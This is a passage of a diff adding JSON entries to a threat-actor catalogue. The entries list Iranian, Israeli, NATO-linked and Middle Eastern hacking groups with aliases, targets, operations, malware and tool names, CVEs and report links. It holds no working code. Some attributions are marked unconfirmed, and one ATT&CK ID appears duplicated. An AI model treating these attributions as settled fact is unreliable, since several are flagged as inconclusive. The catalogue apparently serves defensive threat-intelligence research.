"https://ti.360.com/upload/report/file/mryxdgkb20160707en.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "ITSecTeam" + ], + "targets": [ + "One of the threat actors responsible for the denial of service attacks against U.S in 2012/2013. Three individuals associated with the group believed to be have been working on behalf of Iran's Islamic Revolutionary Guard Corps were indicted by the Justice Department in 2016." + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.washingtonpost.com/world/national-security/iran-blamed-for-cyberattacks/2012/09/21/afbe2be4-0412-11e2-9b24-ff730c7f6312_story.html", + "http://www.nytimes.com/2013/01/09/technology/online-banking-attacks-were-work-of-iran-us-officials-say.html", + "http://pastebin.com/mCHia4W5" + ], + "attck_id": "G0059", + "comment": null + }, + { + "country": "iran", + "names": [ + "Static Kitten", + "Seedworm", + "MERCURY", + "MuddyWater", + "SectorD02", + "Cobalt Ulster", + "TEMP.Zagros" + ], + "targets": [ + "individuals in Asia and the Middle East, government and defense entities in Central and Southwest Asia" + ], + "operations": [ + "BlackWater", + "Operation Quicksand" + ], + "description": null, + "tools": [ + "LaZagne", + "", + "Covicli", + "POWERSTATS", + "Thanos Ransomware", + "MoriAgent", + "PoweMuddy", + "PowGoop", + "Crackmapexec", + "ScreenConnect", + "Pudpoul" + ], + "links": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://www.picussecurity.com/resource/blog/ttp-ioc-used-by-muddywater-apt-group-attacks", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html", + "https://sec0wn.blogspot.co.il/2018/03/a-quick-dip-into-muddywaters-recent.html", + "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf", + "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/", + "https://www.prevailion.com/summer-mirage-2/", + "https://securelist.com/muddywaters-arsenal/90659/", + "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", + "https://threatrecon.nshc.net/2019/03/07/sectord02-powershell-backdoor-analysis/", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a", + "https://www.bleepingcomputer.com/news/security/microsoft-iranian-hackers-actively-exploiting-windows-zerologon-flaw/", + "https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.secureworks.com/blog/business-as-usual-for-iranian-operations-despite-increased-tensions", + "https://www.telsy.com/operation-space-race-reaching-the-stars-through-professional-social-networks/", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://sec0wn.blogspot.com/2018/02/burping-on-muddywater.html", + "https://www.clearskysec.com/operation-quicksand/", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/" + ], + "attck_id": "G0069", + "comment": "Struggle with Kaspersky, relates to UNC3313" + }, + { + "country": "iran", + "names": [ + "Silent Librarian", + "Cobalt Dickens", + "Yellow Nabu", + "Mabna Institute", + "TA407" + ], + "targets": [ + "144 universities in the United States, 176 foreign universities in 21 countries, five federal and state government agencies in the United States, 36 private companies in the United States, 11 foreign private companies, and two international non-governmental organizations" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.bleepingcomputer.com/news/security/iranian-hackers-create-credible-phishing-to-steal-library-access/", + "https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment", + "https://www.secureworks.com/research/threat-profiles/cobalt-dickens", + "https://www.fbi.gov/wanted/cyber/iranian-mabna-hackers", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/", + "https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/", + "https://twitter.com/ClearskySec/status/977899578346430464", + "https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again", + "https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities", + "https://www.proofpoint.com/us/threat-insight/post/seems-phishy-back-school-lures-target-university-students-and-staff" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "DarkHydrus " + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "RogueRobin" + ], + "links": [ + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" + ], + "attck_id": "G0079", + "comment": null + }, + { + "country": "iran", + "names": [ + "Domestic Kitten" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", + "https://research.checkpoint.com/domestic-kitten-an-iranian-surveillance-operation/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Leafminer", + "Flash Kitten", + "Raspite" + ], + "targets": [ + "MENA Region" + ], + "operations": [], + "description": null, + "tools": [ + "guester / Trojan.Imecab", + "Sorgu" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.dragos.com/blog/20180802Raspite.html", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + ], + "attck_id": "G0077", + "comment": "long-running SWC campaigns from December 2016 until public disclosure in July 2018" + }, + { + "country": "iran", + "names": [ + "Gold lowell", + "Boss Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "SamSam" + ], + "links": [ + "https://garwarner.blogspot.com/2018/11/two-iranian-hackers-charged-with-6.html", + "https://www.secureworks.com/research/samsam-ransomware-campaigns", + "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public", + "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "iran", + "names": [ + "Iridium" + ], + "targets": [], + "operations": [ + "Citrix Hack", + "Australian Parliament Hack" + ], + "description": null, + "tools": [ + "reGeorge", + "LazyCat", + "China Chopper / Ckife Webshells" + ], + "links": [ + "https://www.scmagazine.com/home/security-news/apts-cyberespionage/iridium-cyberespionage-gang-behind-aussie-parliament-attacks/", + "https://www.wsj.com/articles/iran-blamed-for-cyberattack-on-australias-parliament-11550736796", + "https://www.forbes.com/sites/kateoflahertyuk/2019/03/15/who-is-resecurity-the-firm-that-named-the-iranian-group-allegedly-behind-the-citrix-hack/", + "https://www.zdnet.com/article/citrix-discloses-security-breach-of-internal-network/" + ], + "attck_id": null, + "comment": "NOTHING CONFIRMED YET" + }, + { + "country": "iran", + "names": [ + "DNSpionage", + "Oilrig" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Imperial Kitten", + "APT35", + "Tortoiseshell" + ], + "targets": [ + "IT providers in Saudi Arabia" + ], + "operations": [], + "description": null, + "tools": [ + "Poison Frog", + "Infostealer/stereoversioncontrol.exe", + "Backdoor.Syskit", + "Infostealer/Sha.exe/Sha432.exe", + "get-logon-history.ps1" + ], + "links": [ + "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain", + "https://www.cyberscoop.com/saudi-arabia-hackers-it-providers-symantec/", + "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html" + ], + "attck_id": "G0059", + "comment": "Inconclusive link to OilRig/APT34" + }, + { + "country": "iran", + "names": [ + "?" + ], + "targets": [ + "Oil companies in the middle east" + ], + "operations": [ + "Bapco Attack" + ], + "description": null, + "tools": [ + "Zerocleare", + "DUSTMAN" + ], + "links": [ + "https://www.ibm.com/downloads/cas/OAJ4VZNJ?_ga=2.162718588.1703640646.1575470035-355468858.1568634484&cm_mc_uid=62832336079115590460108&cm_mc_sid_50200000=12616311575470030712", + "https://www.wired.com/story/iran-soleimani-cyberattack-hackers/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Parisite", + "Pioneer Kitten", + "Fox Kitten", + "UNC757", + "Pay2key" + ], + "targets": [ + "IT, Telecommunication, Oil and Gas, Aviation, Government, and Security sectors around the world." + ], + "operations": [ + "Pay2Key" + ], + "description": null, + "tools": [ + "Invoke-SMBEnum", + "Invoke-SMBExec", + "Invoke-WMIExec", + "STSRCHECK", + "Pay2Key ransomware", + "FRPC", + "Ngrok", + "LPManager", + "Port", + "Invoke-SMBClient", + "SSHNET", + "Juicy Potato", + "Invoke-TheHash", + "SOCKET-Based Backdoor" + ], + "links": [ + "https://us-cert.cisa.gov/ncas/alerts/aa20-259a", + "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/", + "https://dragos.com/blog/industry-news/the-state-of-threats-to-electric-entities-in-north-america/", + "https://www.clearskysec.com/fox-kitten/https://www.clearskysec.com/pay2kitten/" + ], + "attck_id": null, + "comment": "Overlaps with APT33, APT34 and Chafer" + }, + { + "country": "iran", + "names": [ + "Tracer KItten" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "BlackShadow", + "Agrius" + ], + "targets": [ + "Finance, Hosting, Telecomminication, Israeli people, Academic Sector" + ], + "operations": [], + "description": "Influence Operations, Ransomware", + "tools": [ + "Apstole", + "Detbosit", + "Deadwood", + "IPSecHelper" + ], + "links": [ + "https://assets.sentinelone.com/sentinellabs/evol-agrius" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "MalKamak" + ], + "targets": [], + "operations": [ + "Operation GhostShell" + ], + "description": null, + "tools": [ + "ShellClient" + ], + "links": [ + "https://www.cybereason.com/blog/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Nemesis Kitten", + "Charming Kitten", + "DireFate" + ], + "targets": [ + "Oil and Gas, Manufacturing, Media, Telecommunications, Government" + ], + "operations": [], + "description": null, + "tools": [ + "Plink", + "FRP", + "Bitlocker", + "Shredder (wiper)" + ], + "links": [ + "https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/", + "https://www.cisa.gov/uscert/ncas/alerts/aa21-321a" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "UNC3313" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "GRAMDOOR", + "STARWHALE" + ], + "links": [ + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage" + ], + "attck_id": null, + "comment": "Relates to MuddyWater" + }, + { + "country": "iran", + "names": [ + "DEV-0343" + ], + "targets": [ + "US & Israeli defense technology companies, Persian Gulf ports of entry, or global maritime transportation companies " + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "israel", + "names": [ + "Unit 8200" + ], + "targets": [ + "Directed at Iranian nuclear facilities" + ], + "operations": [ + "Olympic Games / Stuxnet" + ], + "description": "Stuxnet is typically introduced to the target environment via an infected USB flash drive.", + "tools": [ + "Stuxnet" + ], + "links": [ + "http://www.langner.com/en/wp-content/uploads/2013/11/To-kill-a-centrifuge.pdf ", + "https://archive.org/details/Stuxnet" + ], + "attck_id": null, + "comment": null + }, + { + "country": "israel", + "names": [ + "Duqu Group", + "Unit 8200" + ], + "targets": [ + "A threat actor, using a tool dubbed Duqu 2.0, targeted individuals and companies linked to the P5+1 (the five permanent member states of the UN Security Council, plus Germany), which was conducting negotiations on Iran's nuclear program. " + ], + "operations": [ + "Duqu 2.0" + ], + "description": null, + "tools": [ + "Duqu" + ], + "links": [ + "https://blog.crysys.hu/2018/03/territorial-dispute-nsas-perspective-on-apt-landscape/", + "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/", + "https://securelist.com/files/2015/06/The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf", + "http://www.wsj.com/articles/spy-virus-linked-to-israel-targeted-hotels-used-for-iran-nuclear-talks-1433937601" + ], + "attck_id": null, + "comment": null + }, + { + "country": "israel", + "names": [ + "Cheshire Cat", + "SunFlower", + "Flowershop", + "MoonFlower" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://github.com/Yara-Rules/rules/blob/master/malware/APT_CheshireCat.yar", + "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/", + "https://blog.crysys.hu/2018/03/territorial-dispute-nsas-perspective-on-apt-landscape/" + ], + "attck_id": null, + "comment": "Might be related to Duqu, Stuxnetand might attributed to Israel." + }, + { + "country": "nato", + "names": [ + "GOSSIPGIRL" + ], + "targets": [], + "operations": [ + "Olympic Games / Stuxnet" + ], + "description": null, + "tools": [ + "Stuxnet", + "Gauss", + "Flame", + "Duqu", + "Miniflame" + ], + "links": [ + "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0" + ], + "attck_id": null, + "comment": "Collaborative umbrella of varioius threat actors" + }, + { + "country": "nato", + "names": [ + "Housefly", + "EQGRP", + "Equation Group", + "Tilded Team", + "Remsec" + ], + "targets": [], + "operations": [ + "Project Sauron / Strider", + "Socialist", + "Olympic Games / Stuxnet" + ], + "description": null, + "tools": [ + "EquationDrug", + "EquationLaser", + "Regin", + "TripleFantasy", + "Gauss", + "Grayfish", + "Fanny", + "RemSec", + "DoubleFantasy" + ], + "links": [ + "https://twitter.com/RedDrip7/status/1178511323954434048", + "https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/", + "https://web.archive.org/web/20160304022846/http://www.kaspersky.com/about/news/virus/2012/Kaspersky_Lab_and_ITU_Discover_Gauss_A_New_Complex_Cyber_Threat_Designed_to_Monitor_Online_Banking_Accounts", + "https://www.bleepingcomputer.com/news/security/longhorn-cyber-espionage-group-is-actually-the-cia/", + "https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/", + "http://securelist.com/blog/research/67741/regin-nation-state-ownage-of-gsm-networks/", + "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets", + "https://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/" + ], + "attck_id": null, + "comment": "NSA, GCHQ, CSIS, ASIS, GCSB, FiveEyes, FVEY" + }, + { + "country": "nato", + "names": [ + "APT-C-39", + "Longhorn", + "Rattlesnake ", + "Lamberts" + ], + "targets": [ + "PRC" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://securityaffairs.co/wordpress/57916/apt/longhorn-group-cia.html", + "http://blogs.360.cn/post/APT-C-39_CIA_EN.html", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + ], + "attck_id": null, + "comment": "CIA" + }, + { + "country": "nato", + "names": [ + "Snowglobe", + "Animal Farm" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Tafacalou", + "Chocopop", + "Babar", + "Casper", + "NBot", + "Bunny", + "Dino" + ], + "links": [ + "https://securelist.com/blog/research/69114/animals-in-the-apt-farm/", + "https://blog.gdatasoftware.com/blog/article/babar-espionage-software-finally-found-and-put-under-the-microscope.html", + "http://www.cyphort.com/evilbunny-malware-instrumented-lua/", + "http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", + "https://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france" + ], + "attck_id": null, + "comment": "Probably French origins" + }, + { + "country": "nato", + "names": [ + "Slingshot" + ], + "targets": [ + "Kenya, Yemen, Libya, Afghanistan, Iraq, Tanzania, Jordan, Mauritius, Somalia, Democratic Republic of the Congo, Turkey, Sudan and United Arab Emirates" + ], + "operations": [ + "Mikrotik Router Compromise" + ], + "description": null, + "tools": [ + "SsCB", + "Sfc2", + "ffproxy", + "GollumApp", + "Spork downloader", + "Minisling", + "Cahnadr", + "NeedleWatch", + "Slingshot" + ], + "links": [ + "https://securelist.com/apt-slingshot/84312/", + "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" + ], + "attck_id": null, + "comment": "US Joint Special Operations Command" + }, + { + "country": "nato", + "names": [ + "?" + ], + "targets": [ + "single victim \u00e2\u0080\u0093 a diplomatic entity from a country in Central Asia" + ], + "operations": [ + "Project Tajmahal" + ], + "description": null, + "tools": [ + "full-blown spying framework consists of two packages named \u00e2\u0080\u0098Tokyo\u00e2\u0080\u0099 and \u00e2\u0080\u0098Yokohama" + ], + "links": [ + "https://securelist.com/project-tajmahal/90240/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "nato", + "names": [ + "Sea Turtle" + ], + "targets": [ + "industries: Ministries of foreign affairs, Military organizations, Intelligence agencies, Prominent energy organizations in US, Libya, Egypt, Lebanon, UAE, Albania, Cyprus, Turkey, Iraq, Jordan, Syria, Armenia, Sweden" + ], + "operations": [ + "Sea Turtle" + ], + "description": null, + "tools": [ + "Drupalgeddon", + "CVE-2017-3881", + "DNS hijacking", + "CVE-2014-6271", + "CVE-2017-6736", + "CVE-2018-0296", + "CVE-2018-7600", + "CVE-2009-1151", + "CVE-2017-12617" + ], + "links": [ + "https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X", + "https://blog.talosintelligence.com/2019/07/sea-turtle-keeps-on-swimming.html", + "https://blog.talosintelligence.com/2019/04/seaturtle.html" + ], + "attck_id": null, + "comment": "Turkish threat group" + }, + { + "country": "middle_east", + "names": [ + "Gaza cyber gang", + "Molerats", + "ALUMINUM SARATOGA", + "Gaza Hacker Team", + "MITRE: G0021" + ], + "targets": [ + "Israel, Palestine, Egypt, Saudi Arabia, United Arab Emirates, Turkey, USA. (Targeted sectors include governmental and diplomatic institutions, including embassies; companies from the aerospace and defence Industries; financial institutions; journalists; software developers.)" + ], + "operations": [ + "TopHat", + "DustySky", + "Molerats" + ], + "description": "targeted emails with malware. fake website with malicipretending to be a legitimate iOS management software, and linking to it in an online freelancing marketplace.", + "tools": [ + "RTFs Exploiting CVE-2017-0199", + "Scote", + "DustySky", + "Don\u00e2\u0080\u0099t Kill My Cat (DKMC)", + "NeD Worm", + "Poison Ivy" + ], + "links": [ + "http://www.clearskysec.com/molerats-iec/", + "https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east", + "https://securelist.com/gaza-cybergang-updated-2017-activity", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "http://www.clearskysec.com/dustysky/", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/", + "https://github.com/kbandla/APTnotes/raw/master/2012/Cyberattack_against_Israeli_and_Palestinian_targets.pdf", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37", + "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one", + "https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage", + "http://pwc.blogs.com/cyber_security_updates/2016/11/molerats-theres-more-to-the-naked-eye.html", + "http://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", + "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-2-the-discovery-of-the-new-mysterious-pierogi-backdoor", + "https://securelist.com/blog/research/72283/gaza-cybergang-wheres-your-ir-team" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Desert Falcon", + "APT-C-23", + "APT_C_23", + "AridViper", + "Two-tailed Scorpion" + ], + "targets": [ + "Egypt, Palestine, Israel, Jordan, UAE,Israeli-based organizations in the government, transport/infrastructure, military, and academia. One organization based in Kuwait is also as one of Arid Viper\u00e2\u0080\u0099s victims." + ], + "operations": [], + "description": "spear phishing", + "tools": [], + "links": [ + "https://research.checkpoint.com/2020/hamas-android-malware-on-idf-soldiers-this-is-how-it-happened/", + "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", + "https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View", + "https://unit42.paloaltonetworks.com/pymicropsia/", + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-gnatspy-mobile-malware-family-discovered/", + "https://securelist.com/blog/research/68817/the-desert-falcons-targeted-attacks/", + "http://securityaffairs.co/wordpress/33785/cyber-crime/arid-viper-israel-sex-video.html", + "https://www.ci-project.org/blog/2017/3/4/arid-viper", + "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/", + "https://blog.cyble.com/2021/09/15/apt-c-23-using-new-variant-of-android-spyware-to-target-users-in-the-middle-east/", + "https://www.threatconnect.com/blog/kasperagent-malware-campaign/", + "https://ti.360.com/upload/report/file/APTSWXLVJ8fnjoxck.pdf", + "http://blog.talosintelligence.com/2017/06/palestine-delphi.html" + ], + "attck_id": null, + "comment": "Related: Operation Advtravel" + }, + { + "country": "middle_east", + "names": [ + "Volatile Cedar", + "Lebanese Cedar" + ], + "targets": [ + "USA, Canada, UK, Turkey, Lebanon and Israel. Nation-state/political-group interests" + ], + "operations": [], + "description": "The modus operandi for this attacker group initially targets publicly facing web servers, with both automatic and manual vulnerability discovery. Once in control of a server, the attackers further penetrate the targeted internal network via various means, including manual online hacking as well as an automated USB infection mechanism.", + "tools": [ + "Explosive", + "Caterpillar 2" + ], + "links": [ + "http://blog.checkpoint.com/2015/03/31/volatilecedar/", + "http://www.checkpoint.com/downloads/volatile-cedar-technical-report.pdf", + "https://www.clearskysec.com/cedar/", + "https://securelist.com/sinkholing-volatile-cedar-dga-infrastructure/69421/" + ], + "attck_id": null, + "comment": "The main threat is sensitive data theft and cyber espionage" + }, + { + "country": "middle_east", + "names": [ + "Syrian Electronic Army (SEA)", + "Deadeye Jackal" + ], + "targets": [ + "Commercial, Financial, Media, Social Networking" + ], + "operations": [], + "description": null, + "tools": [ + "SeANux: Sea Shell (Basic Web Shell)", + "Executer Webshell" + ], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf", + "http://www.crowdstrike.com/blog/dns-lifeblood-your-domain/", + "http://blogs.360.cn/post/Syrian_Electronic_Army.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "United Cyber Caliphate (UCC)", + "Islamic State Hacking Division", + "Cyber Caliphate Army (CCA)" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://en.wikipedia.org/wiki/Islamic_State_Hacking_Division", + "https://ent.siteintelgroup.com/index.php?option=com_customproperties&view=search&task=tag&bind_to_category=content:37&tagId=697" + ], + "attck_id": null, + "comment": "Pro-ISIS" + }, + { + "country": "middle_east", + "names": [ + "Ghost Jackal" + ], + "targets": [ + "Commercial, Energy, Financial" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Corsair Jackal" + ], + "targets": [ + "Commercial, Technology, Financial, Energy" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Extreme Jackal" + ], + "targets": [ + "Military, Government" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Electric Powder" + ], + "targets": [ + "Israel Electric Company" + ], + "operations": [ + "Electric Powder" + ], + "description": "spreading malware via fake Facebook profiles and pages, breached websites, self-hosted and cloud based websites", + "tools": [ + "keyloger", + "Downloader" + ], + "links": [ + "https://www.riskiq.com/blog/analyst/powering-threat-investigations/", + "http://www.clearskysec.com/iec/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "APT-C-23" + ], + "targets": [], + "operations": [ + "Operation Bearded Barbie" + ], + "description": null, + "tools": [ + "KASPERAGENT and MICROPSIA", + "Desert Scorpion" + ], + "links": [ + "https://blog.lookout.com/frozencell-mobile-threat", + "https://ti.360.net/blog/uploads/2017/09/22/f41a337e10e992f17986af386a62c7ad.pdf", + "https://blog.lookout.com/desert-scorpion-google-play", + "https://www.cyberscoop.com/hamas-spyware-desert-scorpion-apt-c-23-google-play-lookout/", + "https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", + "https://www.cybereason.com/blog/operation-bearded-barbie-apt-c-23-campaign-targeting-israeli-officials" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Golden Rat", + "APT-C-27", + "Goldmouse" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.360totalsecurity.com/en/the-sample-analysis-of-apt-c-27s-recent-attack/", + "https://securityaffairs.co/wordpress/74670/malware/apt-c-27-syria-espionage.html", + "https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/", + "https://www.anquanke.com/post/id/94072" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Dark Caracal" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Pallas Bandook CrossRAT Infected Documents " + ], + "links": [ + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Tempting Cedar" + ], + "targets": [ + "people in Eastern European and Middle Eastern countries" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "?" + ], + "targets": [ + "Palestinian authorities" + ], + "operations": [ + "Big Bang" + ], + "description": null, + "tools": [ + "MICROPSIA" + ], + "links": [ + "https://research.checkpoint.com/apt-attack-middle-east-big-bang/", + "https://blog.talosintelligence.com/2017/06/palestine-delphi.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Sandcat" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "CHAINSHOT", + "CVE-2018-8589", + "FinFisher/FinSpy" + ], + "links": [ + "https://securelist.com/zero-day-in-windows-kernel-transaction-manager-cve-2018-8611/89253/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "WIRTE", + "Group WITRE" + ], + "targets": [ + "people from the Palestinian authority and UAE" + ], + "operations": [], + "description": "1. Rar file with a geo-political name in Arabic, usually conerns the Palestinian Authority and Gaza 2. VBS/SCR with the same name.3. Decoy Doc contains copied content that was published by media outlet (modified content)4. Backdoor", + "tools": [], + "links": [ + "https://www.securityartwork.es/2019/01/25/wirte-group-attacking-the-middle-east/", + "https://www.securityartwork.es/2019/01/18/grupo-wirte-atacando-a-oriente-medio/", + "https://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html", + " https://twitter.com/ItsReallyNick/status/1033413803470467072", + "https://lab52.io/blog/wirte-group-attacking-the-middle-east/", + " https://twitter.com/ClearskySec/status/1085160222233112577", + "https://twitter.com/jeFF0Falltrades/status/1085247772582912003", + "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Saber Lion", + "APT-C-38", + "ZooPark" 